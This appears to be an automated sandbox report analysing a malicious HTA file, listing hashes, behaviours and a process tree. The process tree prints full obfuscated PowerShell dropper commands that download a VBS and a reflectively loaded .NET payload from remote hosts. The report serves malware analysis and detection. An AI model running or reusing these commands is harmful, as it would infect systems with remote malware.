Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-09-2024 14:13
Static task
static1
Behavioral task
behavioral1
Sample
IEnetbookCookies.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
IEnetbookCookies.hta
Resource
win10v2004-20240802-en
General
-
Target
IEnetbookCookies.hta
-
Size
115KB
-
MD5
e22849cf884da37532e50f50a298c344
-
SHA1
b40e6ca50290ed885ff60c691444b33f3fb0a643
-
SHA256
e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057
-
SHA512
7d241fe5b00949a1b3f12f86359f1870a19fbf400b7ebb10ae6936ea44ab6ac01cd838d801a7be502b3e58c97c33db317ef1d0bc12db108f2f766ad6bf03b40e
-
SSDEEP
96:Ea+M7XN7VQ63VQcuLNdfJ1LV9jzeVQda8AT:Ea+QXgXPnzILT
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2424 powershell.exe 6 2960 powershell.exe 7 2960 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1636 powershell.exe 2960 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2424 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 1636 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2272 2416 mshta.exe 30 PID 2416 wrote to memory of 2272 2416 mshta.exe 30 PID 2416 wrote to memory of 2272 2416 mshta.exe 30 PID 2416 wrote to memory of 2272 2416 mshta.exe 30 PID 2272 wrote to memory of 2424 2272 cmd.exe 32 PID 2272 wrote to memory of 2424 2272 cmd.exe 32 PID 2272 wrote to memory of 2424 2272 cmd.exe 32 PID 2272 wrote to memory of 2424 2272 cmd.exe 32 PID 2424 wrote to memory of 2216 2424 powershell.exe 33 PID 2424 wrote to memory of 2216 2424 powershell.exe 33 PID 2424 wrote to memory of 2216 2424 powershell.exe 33 PID 2424 wrote to memory of 2216 2424 powershell.exe 33 PID 2216 wrote to memory of 2832 2216 csc.exe 34 PID 2216 wrote to memory of 2832 2216 csc.exe 34 PID 2216 wrote to memory of 2832 2216 csc.exe 34 PID 2216 wrote to memory of 2832 2216 csc.exe 34 PID 2424 wrote to memory of 2732 2424 powershell.exe 37 PID 2424 wrote to memory of 2732 2424 powershell.exe 37 PID 2424 wrote to memory of 2732 2424 powershell.exe 37 PID 2424 wrote to memory of 2732 2424 powershell.exe 37 PID 2732 wrote to memory of 1636 2732 WScript.exe 38 PID 2732 wrote to memory of 1636 2732 WScript.exe 38 PID 2732 wrote to memory of 1636 2732 WScript.exe 38 PID 2732 wrote to memory of 1636 2732 WScript.exe 38 PID 1636 wrote to memory of 2960 1636 powershell.exe 40 PID 1636 wrote to memory of 2960 1636 powershell.exe 40 PID 1636 wrote to memory of 2960 1636 powershell.exe 40 PID 1636 wrote to memory of 2960 1636 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookCookies.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m5owcyoy.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB858.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB857.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e038c818cf5866c0da0994539cf21715
SHA182e2556eca771d4d14da77b890b8e9f4ce9781ee
SHA2561aa648e11562564972640766e3b0ec7073549b34aafc851d61acf96c6e2336a1
SHA512e6fcbe5ead58094a387c9cbe66dc56fcd0b193c0cebe3de5dbcc99c1e7a760f70d479be99694ff862efc92223e51e1309d30a36b17fc179cbc2390663d23fca1
-
Filesize
3KB
MD57b8f67888d29a5918df04965cc1d5c68
SHA1b891661ccac9bc245e78128b329ce2b8c472cee2
SHA2565dbc40edbc852486af1d4cbc752597b9a7023e17b96ca42d245995559ea7c707
SHA512807030effda9c1265cf622c6d922916fde4a2e697a0ddd5a5ff7be50bb562d59eec6835bc4033c6bf70d0cc8ba144cd068c48aa1c203c8e644be8e5debd809b9
-
Filesize
7KB
MD5acf4e9490d54f194b9027065639a2151
SHA13ff7c85e7a4d375241e7e98e5832fcfd12c06ecf
SHA256a8ac1d0800edec1346d29639c5b05a858594643faa9e84af2f81d4e8cd496649
SHA512c350daea18168ecba67c96b9c66bad88b96581551a17c6f2ba7d1ca9b64b1d5e26ce88d6edfe90dc992d58069f5e3783c35f98c4619673bfe333db74bedca808
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5afecfc71e59992e380b68ead1633b4a5
SHA196a543882aea9409536718f70854534ebde483e7
SHA256bd68c2cdb0cd01444dcc5bff60e4a0838de92ffbb302f6041430370584f9066f
SHA512477f3fc0938a051784a87fca6c7fa0e90f03f7e21971684e4eaa9378e3d7be2f9f4094f9110a6e1846f599b6db665453048e6a10aef0461ca82e84430cbf1a5c
-
Filesize
257KB
MD5134f2e8115174dea5246b807fd0c8427
SHA1c47a738087706c17b345c8b93b8eb71c1518e3a8
SHA25601b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d
SHA512efc7386287e271b6d1050f1c585073351b0b9cc9cd551cb759f02fbe4a492bb3ff20b3d498cd608558353b1879a591ae630e5e0e1e0d7286a31fdde7787c0c08
-
Filesize
652B
MD5fc74717d9d9829b97e9042760bcb27bc
SHA14a707321054ff3153d4158ed3af24f2aa867a948
SHA256c7cc79042042927678ea7082fdc6300ce4eb39c43c9c2c142226522403df0170
SHA512996c14eff5fcc059ece91be99f9375f3e4fa8c8d861e8a62af8e32d4dc3d780f2a8f16343b53ed00dd25fba7b02cbed2ab9a9fbb075d3e14825afdec390fdb25
-
Filesize
458B
MD5e07522da7bc6c3ae3fc141d4f7384edf
SHA10b2d7ab75bca2211d5aea9a1671929f033bbaf09
SHA256b0428efd614521c6b91abdad5a9885a2698f8729a6fc77087383a4a07e28da19
SHA5126d30515cd0dddd23f8d2554d107c5afee82d29aa7c5dc6878546758350c13bd8421b066b39bd1d782381e70e75f9afe1e521d301e9478ecf16f9b075ed34addd
-
Filesize
309B
MD5c923eb7b065ece1eee02fbfb00a8e1dd
SHA10df9e6a790b1a1a43d27643c3d81260408f31003
SHA256141fefb11f8e0bc4c73a3c7414c16f2775003399187f4300bdfc6bcfb98e7c75
SHA51264a42c48ce449a600b6d3e620ec14d7e3a6238c870be1795e6426c0ae15421b3a7a8af95b9c1050af8160074f0100af66a9624a54144d1b640593d30a4ccf926